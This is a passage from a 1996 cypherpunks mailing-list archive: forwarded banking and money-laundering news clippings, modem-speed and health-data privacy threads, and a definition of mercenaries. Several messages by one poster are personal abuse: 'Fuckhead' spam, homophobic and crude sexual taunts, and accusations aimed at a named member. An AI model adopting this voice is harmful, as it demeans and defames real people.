En37Z0BdbFzgF00FRYTFyTq8eezQrdg/+rBPUsZUmG5wpq3e12FKHQsX01i+1mB2 YmqqwCV5e95eiQCVAgUQMh8uSb5OPIRbv66xAQEqJwP/fxQyiCasjFcbDpsFfsYp put5cCC/9pOx6X3DlbKShPMpUOS+A9HsTEmJQN8Iawv1nSwPdtc2cR/GhW6ilVjW LSloGdMVLabm9pGpZZMkRaZlXFUkOv7VhfgsUiL+vIDryBCAwUZCzQiWycjt/cPi mUqFH41Z7NkyO8ZFdi5GGX0= =CMZA -----END PGP PUBLIC KEY BLOCK----- From dlv at bwalk.dm.com Wed Sep 18 20:38:21 1996 From: dlv at bwalk.dm.com (Dr.Dimitri Vulis KOTM) Date: Thu, 19 Sep 1996 11:38:21 +0800 Subject: [NEWS] Crypto-relevant wire clippings In-Reply-To: <199609181401.AA21244@crl11.crl.com> Message-ID: <5gLguD3w165w@bwalk.dm.com> >From varange at crl.com Wed Sep 18 10:09:46 1996 Received: by bwalk.dm.com (1.65/waf) via UUCP; Wed, 18 Sep 96 11:07:02 EDT for dlv Received: from mail.crl.com by uu.psi.com (5.65b/4.0.061193-PSI/PSINet) via SMTP; id AA17510 for dlv at bwalk.dm.com; Wed, 18 Sep 96 10:09:46 -0400 Received: from crl11.crl.com by mail.crl.com with SMTP id AA03347 (5.65c/IDA-1.5 for ); Wed, 18 Sep 1996 07:10:14 -0700 Received: by crl11.crl.com id AA21244 (5.65c/IDA-1.5 for dlv at bwalk.dm.com); Wed, 18 Sep 1996 07:01:51 -0700 From: Troy Varange Message-Id: <199609181401.AA21244 at crl11.crl.com> Subject: Re: [NEWS] Crypto-relevant wire clippings To: dlv at bwalk.dm.com (Dr.Dimitri Vulis KOTM) Date: Wed, 18 Sep 1996 07:01:50 -0700 (PDT) In-Reply-To: <3kJFuD96w165w at bwalk.dm.com> from "Dr.Dimitri Vulis KOTM" at Sep 17, 96 10:32:37 pm X-Mailer: ELM [version 2.4 PL23] Mime-Version: 1.0 Content-Type: text/plain; charset=US-ASCII Content-Transfer-Encoding: 7bit Content-Length: 19290 > > Money Laundering Alert: August 1996 > > 'Unauthorized' Banks Pose Laundering Threat > > They are subject to none of the recordkeeping or reporting requirements > of the Bank Secrecy Act, receive no examinations from any banking > regulator, and may be on your bank's currency transaction reporting > exemption list. > > The Office of the Comptroller of the Currency refers to them as > "entities that may be conducting banking operations in the U.S. without > a license." Money launderers probably refer to them as dreams come true > and, unless legitimate financial institutions are alert, can use them to > place illicit proceeds into the financial system. > > They are "unauthorized" banks, and for the past five years the OCC has > been disseminating advisories to legitimate U.S. banks - but not to > consumers - in an effort to expose their existence and halt their > illegal operations. > > These so-called "banks" offer a variety of banking services, often at > lower fees and better interest rates than legitimate banks offer. What > makes them different from a legitimate bank - and attractive to money > launderers -- is that they are not licensed by any U.S. banking agency > and thus do not have to meet regulatory standards. > > Because the OCC and other federal bank regulators are not investigative > agencies, they can do little more than report these institutions to > those who are. If the entities are found to be operating a bank without > a license they can be prosecuted under the Glass-Steagell Act (Title 12, > USC Sec. 378(a)(2)). > > Such prosecutions are rare. In one case in 1994, initiated by Federal > Reserve Board examiners, the principals of Lombard Bank, Ltd., were > charged with operating an unauthorized bank through a payable-through > account at American Express Bank International in Miami. Lombard, which > had been "licensed" in the South Pacific money laundering haven of > Vanuatu, offered its Central American customers virtually full banking > services in the U.S. through its PTA (MLA, Sep. 1994). > > Earlier this year, the OCC released a list of more than 50 "banks" known > to be operating without authorization. OCC officials say the number > grows steadily. Some of the "banks" say they are licensed by foreign > countries or U.S. states to conduct banking business. Others, such as > the Swiss Trade & Commerce Trust, Ltd., of Belize, continue to offer > services in the U.S. despite edicts from foreign banking authorities to > cease doing business. > > The unauthorized entities have a common trait. They usually have names > that are similar to those of well-known legitimate institutions. The OCC > list includes the Bank of England, a Washington, D.C., entity not > associated with London's famous "old lady on Threadneedle Street" and > Citicorp Financial Services, a Beverly Hills firm not associated with > the better-known institution of that name. It also includes the First > Bank of Internet, which heralds itself as the first bank in cyberspace. > > Through its periodic "special alerts," the OCC warns banks to "view with > extreme caution any proposed transaction involving any of the listed > entities." It makes no effort to educate members of the general public > who unknowingly place their money and trust in those uninsured > institutions. > > > > > American Banker: Friday, August 30, 1996 > > Swift Near Alliance in Trade Document Automation > > By STEVEN MARJANOVIC > > Swift, the international banking telecommunications network, wants to > play a bigger role in trade finance and the exchange of related > documentation. > > Sources said the Brussels-based organization will soon take a position-- > perhaps as early as its September board meeting-- on whether to work on > trade automation in cooperation with another consortium, called Bolero. > > Such a move would involve an increase in nonbank participants on a > bank-owned network that has approached such liberalization cautiously. > > Swift, formally the Society for Worldwide Interbank Financial > Telecommunication, is used by 5,300 banks for exchanging messages in > such areas as funds transfer, foreign exchange, and securities. > > The network averaged about 2.7 million messages a day in July, > representing daily dollar volumes exceeding $2 trillion. > > Officials said Swift is nearing a decision to work with the Bolero > Association, which is forming an electronic registry for the so-called > "dematerializing" of trade documents. Swift could provide the "platform" > for allowing banks and corporations to exchange such documentation as > letters of credit and bills of lading. > > Bolero was formed in 1994 with funding from the European Commission, but > has not formulated concrete operating plans. Its members include > Citicorp, Barclays Bank PLC, and other multinational banks and > corporations. > > Peter Scott, trade services market director at Swift, said it has been > in discussions with London-based Bolero since December 1995 about > joining forces to automate the exchange of trade documents. > > "Bankers are beginning to sense both the opportunities in those areas > and the threats to them from an intermediary stepping in and potentially > taking away the business," Mr. Scott said. > > Trade-document capability "is not a heavily utilized area within Swift > at the present time," he said. > > The potential in automation is obvious to Bolero officials. At the New > York Banktrade Conference recently, John McKessy, the association's > North American representative, said the annual value of goods moved > internationally approaches $4 trillion. > > He estimated current international trade requires some three billion > documents to be issued and managed. > > The cost of dealing with paper alone eats up about 7% of the total value > of those goods, as much as $280 billion, Mr. McKessy said. > > Bank revenues from issuing letters of credit last year were just over $1 > billion, according to a soon-to-be-released survey by the U.S. Council > on International Banking. > > Anthony K. Brown, senior vice president of trade services at MTB Bank, > described trade transaction processing as "extremely cumbersome and > tedious, prone to mistakes and delays (that) can be a hindrance to the > completion of a transaction." > > MTB is a $400 million-asset merchant bank based in New York. About 80% > of its $100 million in loans are trade-related. > > The paper-shuffling costs are not borne entirely by banks. Import/export > companies, insurers, freight forwarders, and various government > inspection agencies are also involved. > > "The question is whether Swift wants to do it," said Dan Taylor, > president of the New York-based U.S. Council. > > "Swift is going to act fairly quickly on this," he added. > > Mr. Taylor said Swift officials will likely grapple once again with the > political and philosophical issues of giving nonbanks more access to > Swift, and to payment systems generally. > > In 1995, the network granted partial access to nonbanks after years of > heated debate. > > "You always have this push and pull, where some banks would like Swift > to do certain things" while others want the network to focus on the > money transfer business, Mr. Taylor said. > > "If Bolero succeeds and Swift joins, I think it will move fairly > rapidly, but I'm not sure that Bolero is going to be the only thing out > there." > > He said Bolero might evolve using value-added networks - or intranets - > like the IBM Global Network and General Electric Information Services > Co., or perhaps even the Internet. > > Indeed, another member of Bolero, CSI Complex Systems Inc., New York, is > apparently talking to several providers of private, value-added networks > and may soon enter a contract with one. > > CSI letter-of-credit software leads the pack in banking, with about a > 16% market share, Mr. Taylor said. > > The company recently formed a business unit called Electronic Documents > International, which has developed an Internet-based system for > initiating letters of credit. CSI spokesman George Capsis said the > software, Import.com, creates "about 30 key documents involved in > international trade." > > The Internet, enhanced with security features, may help the trade > industry reduce paper-related costs, especially at smaller companies > overseas. > > CSI managing director Andre Cardinale said customers need only to "dial > into a bank's Internet server, pull up the Import.com application, and > actually fill in the details to create a new letter of credit or an > amendment to an existing one." > > While Bolero may find a place on the Internet or a GE-type network, Mr. > Cardinale said the ultimate push may yet come from the banking industry > working collectively through Swift. > > He said Swift opposition from nonbank constituencies that are concerned > the telecommunications cooperative will be more sympathetic to banks > when disputes arise. > > But "if Swift does it," he added, "it will bring banks into the universe > far more - pardon the pun - swiftly." > > > Crain's New York Business: August 26, 1996 > > Bloomberg to Detail Growth of Information Empire > > Michael Bloomberg made a name for himself on Wall Street with his > trading acumen and mastery of the computer systems that were becoming > crucial to success in the securities business. > > But no one suspected when he left Salomon Brothers in 1981 that in the > next decade he would build the fastest-growing provider of financial > information in the world. > > Mr. Bloomberg, whose company Bloomberg Financial Markets has estimated > sales of $600 million, will be the keynote speaker at the fifth annual > Crain's ''Growing a Business Expo,'' to be held this year on Thursday, > Oct. 24. > > The event will take place at the New York Hilton & Towers from 8 a.m. to > 1 p.m. It is presented by Citibank and co-sponsored by Con Edison and > Empire Blue Cross and Blue Shield. > > Last year, more than 1,000 growing business owners and managers attended > the expo, which provides information for companies operating in the city > regarding potential suppliers, financial resources and government > programs. > > The cost to attend the event is $45 and includes a continental > breakfast. Individuals registering before Sept. 6 can bring a colleague > for free. To register, call Flagg Management at (212) 286-0333. > > In addition to Mr. Bloomberg's speech, attendees will be able to attend > seminars on financing and other help available from the city, financing > techniques, energy cost savings programs and how to reduce health > insurance costs. An expected 135 exhibitors will be offering products > and services of use to growing companies. > > Crain's New York Business editors will discuss how a growing business > can get coverage in Crain's and in other publications. > > The heart of Mr. Bloomberg's empire is a news gathering operation that > sends information through 62,000 computer terminals installed on the > desks of investment professionals around the nation. His company > provides the latest financial news and sophisticated tools to analyze > information. > > The company he has built is noted for its lack of bureaucracy despite > its growth to 2,000 employees. Its hallmarks are hands-on leadership and > an entrepreneurial atmosphere where employees receive perks such as free > food. > > Mr. Bloomberg has extended his reach to include an all-news radio > station in New York, WBBR; Bloomberg Personal TV; syndicated television > shows; a monthly personal finance magazine; and a similar magazine for > institutional investors. > > > American Banker: Friday, September 6, 1996 > > America Online Opens a New Banking Channel > > By DREW CLARK > > Nineteen banks - national home banking stalwarts such as Citicorp and > BankAmerica, plus a complement of less prominent regionals - have > climbed onto the America Online bandwagon. > > Most already offer their customers several options for banking via > personal computer and view America Online, with its six million > subscribers, as a way to appeal to a broad cross-section of computer- > literate consumers. > > Fourteen of the AOL banking partners will be delivering services through > BankNow, a software package developed for the interactive network by > Intuit Inc. > > The other five banks have opted to use their own software. One of them - > Security First Network Bank, which operates entirely on the Internet - > will invite AOL users in through their Web browsers. > > With its announcement this week, America Online Inc. takes its place > among the many alternative "channels" for on-line banking. > > Many of the banks on AOL's list are simultaneously cooperating with > other companies that are themselves competitors, such as Intuit and > Microsoft Corp., suppliers of the Quicken and Money financial management > software, respectively. > > Also crossing competitive lines, America Online said its subscribers > will be able to bank from home with PC software from three suppliers > other than Intuit: Checkfree Corp., Online Resources and Communications > Corp., and Visa Interactive. > > "Everyone understands that there is competition in the home banking > arena," said David Baird, general manager of the personal finance > division at America Online, based in Dulles, Va. "To align ourselves > with exclusively one company would be a mistake." > > Intuit can count on 14 initial bank users of BankNow. Spokesmen for the > other three system vendors declined to say when they expect to have home > banking products available for the AOL channel. > > Experts noted that AOL and Intuit could be a strong tandem, in that they > dominate their respective businesses. > > Intuit's Quicken is the leading brand in personal finance software. The > company claims more than 9 million active users and a market share of > about 80%. > > America Online's subscriber base of six million is as big as those of > its next two competitors, Compuserve and Prodigy, combined. > > The financial institutions currently offering BankNow are: American > Express, Bank of Stockton (Calif.), Centura Banks Inc., Commerce Bank of > Kansas City, Mo., Commercial Federal of Omaha, Compass Bank of Alabama, > CoreStates Financial Corp., Crestar Financial Corp., First Chicago NBD > Corp., Laredo (Tex.) National Bank, M&T Bank of Western New York, > Marquette Bank of Minneapolis, Sanwa Bank California, and Union Bank of > California. > > More plan to offer BankNow-based services through AOL later this year: > BankAtlantic of Florida, Bank of Boston, First Hawaiian Bank, First > Michigan Bank, Mellon Bank, Signet Bank, and U.S. Bank of Oregon. > > Unlike Quicken, BankNow software is available free to America Online > subscribers. > > Banks' fees will vary. First National Bank of Chicago said it will > charge $3.95 a month for on-line banking and $9.95 a month for other > services that include bill payment. > > Centura Banks Inc. said it will offer on-line banking free, and charge > $5.95 a month for bill payment. > > Intuit officials declined to disclose what its Intuit Services Corp. > processing unit will charge to handle these transactions for banks. > > Some of Intuit's larger bank partners chose not to offer BankNow because > they already promote their own PC banking programs. > > For example, Citicorp, First Union, and Wells Fargo each support > Quicken, but passed on BankNow. Instead, they are paying a premium for a > "button" on America Online's banking screen that will eventually link > users to a proprietary home banking program. > > > > AP Online: Thursday, September 5, 1996 > > House Probes Money Laundering > > By ROB WELLS > > House Banking Committee members on Thursday urged a Treasury Department > agency to step up its efforts to halt money laundering by Mexican drug > lords. > > Rep. Spencer Bachus, R-Ala., urged the Financial Crimes Enforcement > Network to put in place new regulations to plug a significant loophole > that allows Mexico's drug dealers to place their ill-gotten profits back > into the U.S. > > Bachus, chairman of the House Banking oversight subcommittee, said > Congress gave authority to FinCen in 1994 to put in place new rules that > would prevent drug dealers from using foreign bank drafts, a type of > check, to evade currency reporting restrictions. > > ''That effort is long, long overdue,'' Bachus said. > > Rep. Henry Gonzalez, D-Texas, asked the agency to provide further > details about suspected money laundering in his home town of San > Antonio, particularly the source of a $3 billion cash surplus in the San > Antonio Federal Reserve Bank. > > The issue arose as Bachus' panel began exploring the dramatic rise of > narcotics traffic along the 2,000 mile long U.S.-Mexico border, and the > ease with which drug dealers can ship their profits to the south. Money > laundering refers to the practice by which drug dealers, mobsters and > others funnel their illegal profits into the banking system through > businesses or other means. > > Bachus said estimates of drug profits laundered through Mexico range > from $6 billion to $30 billion per year. Stanely E. Morris, FinCen's > director, defended his agency's record, saying a combination of new > rules and tougher enforcement in the past decade has ''made it more > difficult to launder money in the U.S.'' and increased the costs of > money laundering. Morris' agency enforces the Bank Secrecy Act, a key > weapon against money laundering. > > As for the new rules aimed at foreign bank drafts, Morris said the > regulations are more difficult than first expected because such > restrictions also could hinder legitimate commerce. He said the proposal > would be released soon. > > FinCen is working on other fronts to combat money laundering, which > includes a new computer system that tallies bank fraud to help > regulators gain an early warning of money laundering. > > In addition, the Clinton Administration assisted Mexico in adopting new > anti-money laundering rules earlier this year. And Treasury Secretary > Robert Rubin convened a conference of 29 nations in December 1995 to > focus on the money laundering problem. > > One committee member, Rep. Maxine Waters, D-Calif., addressed the > political context of the hearings. > > Waters said she was suspicious that the Republican-led Congress was > holding ''a rash of hearings this month ... on the subject of drugs just > as Presidential candidate Dole tries to use the issue as part of his > campaign strategy against President Clinton.'' > > Waters said if the GOP-led House ''is truly serious about the impact of > drugs'' it should hold hearings about charges raised in a San Jose > Mercury News investigative series last month concerning the role > CIA-backed rebels in Nicaragua played in bringing crack cocaine and > weapons to Los Angeles and other cities. > > Bachus told Waters the hearing wasn't motivated by politics and that he > had personally been involved in anti-drug efforts prior to his election > to Congress. > > --- > > Dr.Dimitri Vulis KOTM Fuckhead. From craigw at dg.ce.com.au Wed Sep 18 20:39:41 1996 From: craigw at dg.ce.com.au (craigw at dg.ce.com.au) Date: Thu, 19 Sep 1996 11:39:41 +0800 Subject: 56 kbps modems Message-ID: <199609190039.KAA20049@mac.ce.com.au> >Interesting. . . Oh well, I bet their competition doesn't mind. That is the major problem. We have only 2 carriers in this country. The market is not being deregulated untill mid 97. Optus the other carrier has only just installed local access (rather than STD, ISDN only) and it covers ~ 11% of the population with this service. The other problem is that they use lines leased from telstra as many councils and communities are complaining about the laying of new cables (arrr joe public). In a recent case where optus decided to try and lay the cables against council wishes the council impounded several of the vehicles used. Is it not great to live in the "lucky country". Here in Au we seem to delight in first complaining of the poor line quality, and than stop new line being installed Craig ,'~``. \|/ ,'``~. (-o=o-) (@ @) ,(-o=o-), +--.oooO--(_)--Ooo-----oOO-(_)-OOo-------oooO--(_)--Oooo.------+ | | | Soon, we may all be staring at our computers, wondering | | whether they're staring back. | | | | [Network Admin For WPA Business Products. aka doshai >;-) ] | | .oooO http://pip.com.au/~doshai/ Oooo. | | ( ) Oooo. .oooO ( ) | +-----\ (----( )-------oooO-Oooo--------( )--- ) /---------+ \_) ) / \ ( (_/ (_/ \_) Key fingerprint = 2D F4 54 BB B4 EA F1 E7 B6 DE 48 92 FC 8D FF 49 Send a message with the subject "send pgp-key" for a copy of my key. (if I want to give it to you) From mthompso at qualcomm.com Wed Sep 18 20:48:52 1996 From: mthompso at qualcomm.com (Michelle Thompson) Date: Thu, 19 Sep 1996 11:48:52 +0800 Subject: Assassination Politics, is now Mercenarial Stuff Message-ID: <2.2.32.19960919011631.002f9c0c@strange.qualcomm.com> >From: kwheeler at intellinet.com >Date: Wed, 18 Sep 1996 20:08:18 -0500 >X-Sender: kwheeler at intellinet.com >To: Michelle Thompson >Subject: Re: Assassination Politics, is now Mercenarial Stuff > >Loosely the term mercenary means one who does a job solely for >profit. Technically, as outlined in Article 47 of Protocol I >Additional to the Geneva Convention of 1949: > >" 2. A mercenary is a person who: > > (a) is specially recruited locally or abroad in order to > fight in an armed conflict; > > (b) does, in fact, take a direct part in the hostilities; > > (c) is motivated to take part in the hostilities by the desire > for private gain, and, in fact, is promised by or on behalf > of a party to the conflict, material compensation substaintially > in excess of that promised or paid to combatants of _simliar_ > ranks (my added emphasis -KMW) and functions in the armed forces > of that party; > > (d) is neither a national of a party to the conflict nor a resident of > terrritory controlled by a part to the conflict; > > (e) is not a memeber of the armed forces of a party to the conflict; >" > > >The foreign legions of France, Spain, and Libya are considered to be >part of the armed forces of those nations, and therefore, strictly speaking, >personnel enlisted in these forces are _not_ mercenaries. > >I had to go dig that info up to see if I had remembered things >somewhat correctly... > >-K > > > From dlv at bwalk.dm.com Wed Sep 18 20:50:17 1996 From: dlv at bwalk.dm.com (Dr.Dimitri Vulis KOTM) Date: Thu, 19 Sep 1996 11:50:17 +0800 Subject: [NEWS] Message-ID: American Banker, 9/17/96 CHASE TO OFFER DEALERSHIPS AUTO LOAN DECISIONS OVER INTERNET Chase Manhattan Corp.'s auto financing division has begun using the Internet to provide dealerships with loan-approval decisions. The bank is the first of eight financial institutions that have committed to using the system, developed by IBM Corp. By computerizing loan applications and sending data electronically, Chase officials said the bank can grant approvals in as few as two minutes. Up to 50% of the division's auto loans will be running through the system within the next 18 months. Chase, the largest car lender not affiliated with a car company, is connected to six dealerships currently using the system and will establish connections to 100 dealers with the official introduction in October. Other financial institutions planning to use the on-line system include NationsBank Corp., G.E. Capital Auto Financial Services Inc., Regions Financial Corp., and Citibank Puerto Rico. The dealer's computer is connected to the Internet through the IBM Globa l Network, which is also used to retrieve an encrypted report from a credit bureau. The dealer's pre-established "key" decodes the report and causes the screen to display one, two, or three stars -- representing poor, fair, or good credit. This gives the dealer an idea of which financial institutions are most likely to approve the loan. --- Dr.Dimitri Vulis KOTM Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, 14.4Kbps From vznuri at netcom.com Wed Sep 18 20:55:32 1996 From: vznuri at netcom.com (Vladimir Z. Nuri) Date: Thu, 19 Sep 1996 11:55:32 +0800 Subject: GAK, GAP, GAY In-Reply-To: Message-ID: <199609190117.SAA04924@netcom21.netcom.com> > >On a related note, I read an article yesterday about the proposed new >Health Data Base, with all encounters with any medical institution or any >health care provider of any sort being cross-linked and cross-referenced. >The privacy concerns are supposedly handled by having "security tickets" >for various hospital officials, researchers (!!), insurance companies, and >law enforcement. (I put the "!!" next to the "researchers" because I don't >recall releasing my medical and dietary history to any so-called >"researchers." While I have no doubt that many "data miners" would like >access to such national data bases, and that some potentially valuable >information could be gleaned, I didn't release this information for Joe >Gradstudent, Ph.D. candidate to sift through.) its worth noting that mapping the human genome is related to health records and privacy issues. essentially scientists have made tremendous progress in mapping out what diseases are caused by what genes. much of this is done with the power of correlating gene mutations with actual health records among the population, the more the better. science progresses on openness. there are legitimate reasons to have large databases of private records. I do believe such things could be accomplished while protecting the privacy of individuals yet giving the benefits to researchers. imagine the concepts of blinding and zero-knowledge protocols applied to health databases. it seems reasonable that this can be worked out. one interesting idea: imagine a system in which "blinding" is an accepted and basic form of interaction between patients and doctors. the patients give only a self-generated ID to the health care provider. the system is set up such that the provider can do all functions necessary to them (keeping records, billing the insurance company) through the "blinding" process. this has a lot of potential. it seems that we could take the blinding process and possibly push for it to be an accepted way of doing business. there's a lot of use for someone to do what Chaum has done for digital cash, i.e. show that all operations necessary to commerce can be supported via blinding-- taking that kind of mapping, and moving it into all other areas of human endeavor. even just rewriting his own papers to be specific to particular fields like the health arena would be a breakthrough at the moment. p.s. I fail to see why calling you "timmy" is considered an ad hominem attack. quite to the contrary, I assure you it is a term of endearment From declan at well.com Wed Sep 18 20:56:22 1996 From: declan at well.com (Declan McCullagh) Date: Thu, 19 Sep 1996 11:56:22 +0800 Subject: 56 kbps modems Message-ID: >From "Technical Aspects of Data Communications" by John E. McNamara: BAUD: A unit of signaling speed equal to the number of discrete conditions or signal events per second. In asynchronous transmission, the unit of signaling speed corresponding to one unit interval per second; that is, if the duration of the unit interval is 20 milliseconds, the signaling speed is 50 baud. Baud is the same as "bits per second" only if each signal event represents exactly one bit. A baud is the reciprocal of the unit interval. In other words, McNamara says (p148), in common 2400 bps modems, the "baud rate" is 1200 baud. -Declan Chris writes: >On Mon, 16 Sep 1996 12:16:08 +0200, Gary Howland wrote: > >>craigw at dg.ce.com.au wrote: >>> well here in Australia Telstra our national carrier only "garantees" >>> 2400 baud to work. >>As I am sure has been discussed at length before, baud does not equal >>bps. AFAIK, V32bis is only 2400baud. >This is correct. The difference is in the number of values for each of the >2400 signals sent per second. > ># Chris Adams | >http://www.io-online.com/adamsc/adamsc.htp ># cadams at acucobol.com | V.M. (619)515-4894 >"I have never been able to figure out why anyone would want to play games on >a computer in any case when the whole system is a game. Word processing, >spreadsheets, telecoms -- it's all a game. And they pay you to play it." > -- Duncan Frissell From dlv at bwalk.dm.com Wed Sep 18 21:11:02 1996 From: dlv at bwalk.dm.com (Dr.Dimitri Vulis KOTM) Date: Thu, 19 Sep 1996 12:11:02 +0800 Subject: A Bizarre Increase in the Ad Hominems Here In-Reply-To: <199609181415.AA21481@crl11.crl.com> Message-ID: >From varange at crl.com Wed Sep 18 10:24:36 1996 Received: by bwalk.dm.com (1.65/waf) via UUCP; Wed, 18 Sep 96 11:07:12 EDT for dlv Received: from mail.crl.com by uu.psi.com (5.65b/4.0.061193-PSI/PSINet) via SMTP; id AA18840 for dlv at bwalk.dm.com; Wed, 18 Sep 96 10:24:36 -0400 Received: from crl11.crl.com by mail.crl.com with SMTP id AA06256 (5.65c/IDA-1.5 for ); Wed, 18 Sep 1996 07:25:04 -0700 Received: by crl11.crl.com id AA21481 (5.65c/IDA-1.5); Wed, 18 Sep 1996 07:15:24 -0700 From: Troy Varange Message-Id: <199609181415.AA21481 at crl11.crl.com> Subject: Re: A Bizarre Increase in the Ad Hominems Here To: dlv at bwalk.dm.com (Dr.Dimitri Vulis KOTM) Date: Wed, 18 Sep 1996 07:15:24 -0700 (PDT) In-Reply-To: from "Dr.Dimitri Vulis KOTM" at Sep 18, 96 08:03:04 am X-Mailer: ELM [version 2.4 PL23] Mime-Version: 1.0 Content-Type: text/plain; charset=US-ASCII Content-Transfer-Encoding: 7bit Content-Length: 1107 > tcmay at got.net (Timmy May) (fart) writes: > > * Detweiler (vznuri at netcom.com) writes: > > Detweiler is much smarter than VZNuri (or Timmy). I don't think Timmy > believes his own lies. > > > (Sadly, a large fraction of the women who have posted on our list have > > written in this same kind of incoherent, rambling, makes-no-sense kind of > > style. I have no idea why the percentage of such events is so high.) > > Is Timmy gay? Why does he hate women so much? > > > * And of course Vulis has been posting his "farting" messages far and wide. > > Recently, 3 people in the computer security field have independently > told me that Timmy May approached them "off-list" to complain about > things I supposedly say on the Internet - most of which I never said. > When I asked about it on this mailing list, Timmy posted what was shown > to be a lie (about his complaint to Kelly Goen.) Timmy is known as a > nutcase and a liar - if he keeps up his "character assassination" > attacks, the only reputation he hurts is his own. > > Dr.Dimitri Vulis KOTM Fuckhead. From wombat at mcfeely.bsfs.org Wed Sep 18 21:32:06 1996 From: wombat at mcfeely.bsfs.org (Rabid Wombat) Date: Thu, 19 Sep 1996 12:32:06 +0800 Subject: GAK, GAP, GAY In-Reply-To: Message-ID: > On a related note, I read an article yesterday about the proposed new > Health Data Base, with all encounters with any medical institution or any > health care provider of any sort being cross-linked and cross-referenced. > The privacy concerns are supposedly handled by having "security tickets" > for various hospital officials, researchers (!!), insurance companies, and > law enforcement. (I put the "!!" next to the "researchers" because I don't > recall releasing my medical and dietary history to any so-called > "researchers." While I have no doubt that many "data miners" would like > access to such national data bases, and that some potentially valuable > information could be gleaned, I didn't release this information for Joe > Gradstudent, Ph.D. candidate to sift through.) Don't get me wrong - I'm not disagreeing with you about how grim your points are. I just wanted to point out that information "could" be released to researchers without identifying the patient - researchers are generally interested in statistical data, such as the incidence of cancer per zip code, etc., which doesn't require your name to be released. Zip codes are sufficiently populated that this probably is of no danger to privacy. OTOH, the potential for mis-use of such records is high, and allowing access to a huge number of commercial sites, and their employees, certainly opens a lot of holes. - r.w. From dlv at bwalk.dm.com Wed Sep 18 21:43:40 1996 From: dlv at bwalk.dm.com (Dr.Dimitri Vulis KOTM) Date: Thu, 19 Sep 1996 12:43:40 +0800 Subject: [joke, non-code] Re: Get this for a snake-oil example :) In-Reply-To: Message-ID: f_estema at alcor.concordia.ca writes: > Shamster: SHA-enabled biocomputing hamster. I'm sure Timmy would like to wrap one up in duct tape and shove it up his ass... --- Dr.Dimitri Vulis KOTM Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, 14.4Kbps From hua at chromatic.com Wed Sep 18 21:46:19 1996 From: hua at chromatic.com (Ernest Hua) Date: Thu, 19 Sep 1996 12:46:19 +0800 Subject: Interesting article in Upside ... Message-ID: <199609190203.TAA22357@ohio.chromatic.com> Article on the political side of crypto with respect to this year's election: http://www.upside.com/print/oct96/election.html Ern From dlv at bwalk.dm.com Wed Sep 18 21:46:53 1996 From: dlv at bwalk.dm.com (Dr.Dimitri Vulis KOTM) Date: Thu, 19 Sep 1996 12:46:53 +0800 Subject: Fuckhead In-Reply-To: <199609181408.AA21359@crl11.crl.com> Message-ID: >From varange at crl.com Wed Sep 18 10:09:35 1996 Received: by bwalk.dm.com (1.65/waf) via UUCP; Wed, 18 Sep 96 11:07:01 EDT for dlv Received: from mail.crl.com by uu.psi.com (5.65b/4.0.061193-PSI/PSINet) via SMTP; id AA17484 for dlv at bwalk.dm.com; Wed, 18 Sep 96 10:09:35 -0400 Received: from crl11.crl.com by mail.crl.com with SMTP id AA03230 (5.65c/IDA-1.5 for ); Wed, 18 Sep 1996 07:10:02 -0700 Received: by crl11.crl.com id AA21359 (5.65c/IDA-1.5 for dlv at bwalk.dm.com); Wed, 18 Sep 1996 07:08:08 -0700 From: Troy Varange Message-Id: <199609181408.AA21359 at crl11.crl.com> Subject: Fuckhead To: dlv at bwalk.dm.com (Dr.Dimitri Vulis KOTM) Date: Wed, 18 Sep 1996 07:08:08 -0700 (PDT) Priority: Fuckhead Precedence: Fuckhead Reply-To: dlv at bwalk.dm.com In-Reply-To: X-Mailer: ELM [version 2.4 PL23] Mime-Version: 1.0 Content-Type: text/plain; charset=US-ASCII Content-Transfer-Encoding: 7bit Content-Length: 10 Fuckhead. From craigw at dg.ce.com.au Wed Sep 18 21:50:11 1996 From: craigw at dg.ce.com.au (craigw at dg.ce.com.au) Date: Thu, 19 Sep 1996 12:50:11 +0800 Subject: Spam blacklist project Message-ID: <199609190217.MAA23297@mac.ce.com.au> What...only half ;) > Half the population doesn't care who their masters are, as long as they > have masters that tell them what to do. > > --Lucky > ,'~``. \|/ ,'``~. (-o=o-) (@ @) ,(-o=o-), +--.oooO--(_)--Ooo-----oOO-(_)-OOo-------oooO--(_)--Oooo.------+ | | | Soon, we may all be staring at our computers, wondering | | whether they're staring back. | | | | [Network Admin For WPA Business Products. aka doshai >;-) ] | | .oooO http://pip.com.au/~doshai/ Oooo. | | ( ) Oooo. .oooO ( ) | +-----\ (----( )-------oooO-Oooo--------( )--- ) /---------+ \_) ) / \ ( (_/ (_/ \_) Key fingerprint = 2D F4 54 BB B4 EA F1 E7 B6 DE 48 92 FC 8D FF 49 Send a message with the subject "send pgp-key" for a copy of my key. (if I want to give it to you) From dlv at bwalk.dm.com Wed Sep 18 21:51:17 1996 From: dlv at bwalk.dm.com (Dr.Dimitri Vulis KOTM) Date: Thu, 19 Sep 1996 12:51:17 +0800 Subject: Fuckhead In-Reply-To: <199609190131.SAA12134@dfw-ix7.ix.netcom.com> Message-ID: >From xreznorx at ix.netcom.com Wed Sep 18 21:32:01 1996 Received: by bwalk.dm.com (1.65/waf) via UUCP; Wed, 18 Sep 96 22:11:56 EDT for dlv Received: from dfw-ix7.ix.netcom.com by uu.psi.com (5.65b/4.0.061193-PSI/PSINet) via SMTP; id AA27000 for dlv at bwalk.dm.com; Wed, 18 Sep 96 21:32:01 -0400 Received: from (xreznorx at dby-ct1-15.ix.netcom.com [205.186.164.47]) by dfw-ix7.ix.netcom.com (8.6.13/8.6.12) with SMTP id SAA12134 for ; Wed, 18 Sep 1996 18:31:52 -0700 Date: Wed, 18 Sep 1996 18:31:52 -0700 Message-Id: <199609190131.SAA12134 at dfw-ix7.ix.netcom.com> From: xreznorx at ix.netcom.com (The ReznoR) Subject: Re: Fuckhead To: dlv at bwalk.dm.com (Dr.Dimitri Vulis KOTM) uh, who the fuck r u? You wrote: > >>From varange at crl.com Wed Sep 18 10:09:35 1996 >Received: by bwalk.dm.com (1.65/waf) > via UUCP; Wed, 18 Sep 96 11:07:01 EDT > for dlv >Received: from mail.crl.com by uu.psi.com (5.65b/4.0.061193-PSI/PSINet) via SMTP; > id AA17484 for dlv at bwalk.dm.com; Wed, 18 Sep 96 10:09:35 -0400 >Received: from crl11.crl.com by mail.crl.com with SMTP id AA03230 > (5.65c/IDA-1.5 for ); Wed, 18 Sep 1996 07:10:02 -0700 >Received: by crl11.crl.com id AA21359 > (5.65c/IDA-1.5 for dlv at bwalk.dm.com); Wed, 18 